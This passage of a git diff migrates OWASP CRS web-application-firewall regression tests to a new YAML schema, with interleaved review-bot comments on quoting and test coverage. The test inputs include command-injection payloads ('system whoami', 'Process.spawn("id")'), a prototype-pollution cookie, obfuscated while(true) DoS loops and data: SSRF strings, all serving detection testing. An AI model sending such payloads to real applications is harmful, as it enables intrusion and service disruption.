submitted as plaintext with JavaScript escape sequence obfuscation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Cookie: test_cookie=__\u0070\u0072oto__.foo=bar - method: GET - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - log_contains: id "934130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Cookie: test_cookie=__\u0070\u0072oto__.foo=bar + method: GET + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + log: + expect_ids: [934130] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml index f926730b5..080d6ab13 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934140.yaml @@ -1,23 +1,21 @@ --- meta: author: "karelorigin, azurit" - enabled: true - name: "934140.yaml" - description: "Tests for rule 934140" +rule_id: 934140 tests: - - test_title: 934140-1 + - test_id: 1 desc: Perl interpolation attack stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?x=@{[system+whoami]}" - version: HTTP/1.0 - output: - log_contains: id "934140" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=@{[system+whoami]}" + version: HTTP/1.0 + output: + log: + expect_ids: [934140] 
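Review bot: The `Cookie: test_cookie=__\u0070\u0072oto__.foo=bar` value in the new `test_id: 13` stage only exercises the escape-sequence evasion because it is a plain (unquoted) scalar, and nothing in the file says so; a later reformat to double quotes would make YAML decode `\u0070\u0072` to `pr`, the stage would still pass because `__proto__` fires, and the evasion coverage would silently vanish. I would add above that line `# keep unquoted: a double-quoted scalar decodes \u0070\u0072 to "pr" and this stage stops testing the obfuscation`. Separately, the rewritten `test_id: 7` and `test_id: 10` carry the identical desc `positive test case with GET parameter, jQuery $.get`, so a failure report cannot tell them apart; one of them should name what distinguishes it (the `[context]=` vs `[jquery]=x` payload).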
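Review bot: After the rewrite 934140.yaml still holds a single positive stage (`test_id: 1`, `uri: "/get?x=@{[system+whoami]}"`) and no negative case, so the suite cannot catch 934140 starting to over-match; 934130 and 934160 both open with a `negative test case` / `Normal text false positive test` stage asserting `no_expect_ids`, and this file does not. The same gap is in the 934150.yaml hunk that follows (`Process.spawn(%22id%22)` is its only stage). A `test_id: 2` sending a benign value in the same parameter, with `output: log: no_expect_ids: [934140]`, would bring these two files in line with the rest of the directory; which benign value is appropriate depends on the rule's pattern, which is not visible here.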
diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml index f52c43e6d..60ed9998e 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934150.yaml @@ -1,23 +1,21 @@ --- meta: author: "karelorigin, azurit" - enabled: true - name: "934150.yaml" - description: "Tests for rule 934150" +rule_id: 934150 tests: - - test_title: 934150-1 + - test_id: 1 desc: Ruby injection test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?x=Process.spawn(%22id%22)" - version: HTTP/1.0 - output: - log_contains: id "934150" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?x=Process.spawn(%22id%22)" + version: HTTP/1.0 + output: + log: + expect_ids: [934150] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml index 0289e3b7c..aed2d48cb 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934160.yaml 
@@ -1,535 +1,533 @@ --- meta: author: "karelorigin, azurit" - enabled: true - name: "934160.yaml" - description: "Tests for rule 934160" +rule_id: 934160 tests: - - test_title: 934160-1 + - test_id: 1 desc: Normal text false positive test stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=while%20(foo)%20is%20bar." - version: HTTP/1.0 - output: - no_log_contains: id "934160" - - test_title: 934160-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=while%20(foo)%20is%20bar." + version: HTTP/1.0 + output: + log: + no_expect_ids: [934160] + - test_id: 2 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!false)" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!false)" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 3 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!-0);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!-0);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 4 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - 
Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!%2B0);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!%2B0);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 5 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!0);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!0);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 6 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!-0);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!-0);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 7 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get?eval=while(!"");' - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + 
port: 80 + uri: '/get?eval=while(!"");' + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 8 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!'');" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!'');" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 9 desc: while falsy with negations stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!``);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!``);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 10 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(true);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(true);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 11 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(Infinity);" - version: HTTP/1.0 - 
output: - log_contains: id "934160" - - test_title: 934160-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(Infinity);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 12 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(-Infinity);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(-Infinity);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 13 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(%2BInfinity);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(%2BInfinity);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 14 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(-1);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(-1);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 15 desc: while truthy stages: - - stage: 
- input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(%2B1);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-16 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(%2B1);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 16 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(new%20Date);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-17 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(new%20Date);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 17 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(this);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-18 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(this);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 18 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(String);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-19 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS 
test agent" + method: GET + port: 80 + uri: "/get?eval=while(String);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 19 desc: while truthy with negation (false positive) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!true);" - version: HTTP/1.0 - output: - no_log_contains: id "934160" - - test_title: 934160-20 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!true);" + version: HTTP/1.0 + output: + log: + no_expect_ids: [934160] + - test_id: 20 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!!{});" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-21 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!!{});" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 21 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!![]);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-22 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!![]);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 22 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - 
User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get?eval=while(!!"");' - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-23 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get?eval=while(!!"");' + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 23 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!!'');" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-24 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!!'');" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 24 desc: while truthy with double negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!!``);" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-25 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!!``);" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 25 desc: while falsy with negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!null)" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-26 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + 
uri: "/get?eval=while(!null)" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 26 desc: while falsy with negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!undefined)" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-27 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!undefined)" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 27 desc: while falsy with negation stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while(!NaN)" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-28 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while(!NaN)" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 28 desc: while truthy stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?eval=while((true)))" - version: HTTP/1.0 - output: - log_contains: id "934160" - - test_title: 934160-29 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?eval=while((true)))" + version: HTTP/1.0 + output: + log: + expect_ids: [934160] + - test_id: 29 desc: "Detect example DoS loop while(true) submitted as plaintext" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=while(true);" - version: HTTP/1.1 - output: - log_contains: id "934160" - - test_title: 934160-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=while(true);" + version: HTTP/1.1 + output: + log: + expect_ids: [934160] + - test_id: 30 desc: "Detect example DoS loop while(true) submitted as plaintext with JavaScript escape sequence obfuscation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=\u0077\u0068ile(true);" - version: HTTP/1.1 - output: - log_contains: id "934160" - - test_title: 934160-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=\u0077\u0068ile(true);" + version: HTTP/1.1 + output: + log: + expect_ids: [934160] + - test_id: 31 desc: "Detect example DoS loop while(true) submitted as plaintext that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D" - version: HTTP/1.1 - output: - log_contains: id "934160" - - test_title: 934160-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test 
agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D" + version: HTTP/1.1 + output: + log: + expect_ids: [934160] + - test_id: 32 desc: "Detect example DoS loop while(true) submitted as plaintext with JavaScript escape sequence obfuscation that has been Base64 encoded" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=XHUwMDc3XHUwMDY4aWxlKHRydWUpOwo%3D" - version: HTTP/1.1 - output: - log_contains: id "934160" - - test_title: 934160-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=XHUwMDc3XHUwMDY4aWxlKHRydWUpOwo%3D" + version: HTTP/1.1 + output: + log: + expect_ids: [934160] + - test_id: 33 desc: "Detect example DoS loop while(true) submitted as plaintext that has been Base64 encoded and then obfuscated with JavaScript escape sequences" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?eval=\u0064\u0032hpbGUodHJ1ZSk7Cg%3D%3D" - version: HTTP/1.1 - output: - log_contains: id "934160" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?eval=\u0064\u0032hpbGUodHJ1ZSk7Cg%3D%3D" + version: HTTP/1.1 + output: + log: + 
expect_ids: [934160] diff --git a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml index 9d3111052..2505e4abe 100644 --- a/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml +++ b/tests/regression/tests/REQUEST-934-APPLICATION-ATTACK-GENERIC/934170.yaml 
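Review bot: Tests 30 and 33 in this hunk do not send the escape-obfuscated payloads their `desc` lines describe, because `\u0077\u0068` and `\u0064\u0032` sit inside double-quoted YAML scalars, where `\uXXXX` is a YAML escape that the parser decodes before the runner sees the value; the parsed `uri` values are `/get?eval=while(true);` and `/get?eval=d2hpbGUodHJ1ZSk7Cg%3D%3D`, byte-identical to tests 29 and 31, so the escape form presumably never reaches the rule and these two cases only duplicate existing coverage. Single quotes keep the backslashes literal: `uri: '/get?eval=\u0077\u0068ile(true);'` for test 30 and `uri: '/get?eval=\u0064\u0032hpbGUodHJ1ZSk7Cg%3D%3D'` for test 33 (test 32 is unaffected, since its escapes are inside the Base64). Separately, test 6 repeats test 3's payload `while(!-0);` verbatim and should either be dropped or given a distinct input.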
@@ -1,61 +1,60 @@ --- meta: author: "fzipi, azurit" - enabled: true - name: "934170.yaml" description: "Tests for rule 934170 - PHP data scheme support" +rule_id: 934170 tests: - - test_title: 934170-1 + - test_id: 1 desc: "SSRF - data: scheme test - IN2OZO3N coverage" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=data:text/plain;base64,SSBsb3ZlIFBIUAo=" - version: "HTTP/1.1" - output: - log_contains: id "934170" - - test_title: 934170-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=data:text/plain;base64,SSBsb3ZlIFBIUAo=" + version: "HTTP/1.1" + output: + log: + expect_ids: [934170] + - test_id: 2 desc: "Negative test - data:// should not match" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=data://text/plain;base64,SSBsb3ZlIFBIUAo=" - version: "HTTP/1.1" - output: - no_log_contains: id "934170" - - test_title: 934170-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: 
GET + uri: "/get?ssrf=data://text/plain;base64,SSBsb3ZlIFBIUAo=" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [934170] + - test_id: 3 desc: "Status Page Test - SSRF - data: scheme test - simple trigger, isolated test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - method: GET - uri: "/get?ssrf=data:text/plain" - version: "HTTP/1.1" - output: - log_contains: id "934170" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + method: GET + uri: "/get?ssrf=data:text/plain" + version: "HTTP/1.1" + output: + log: + expect_ids: [934170] diff --git a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml index e2f420869..b0e54a727 100644 --- a/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml +++ b/tests/regression/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml 
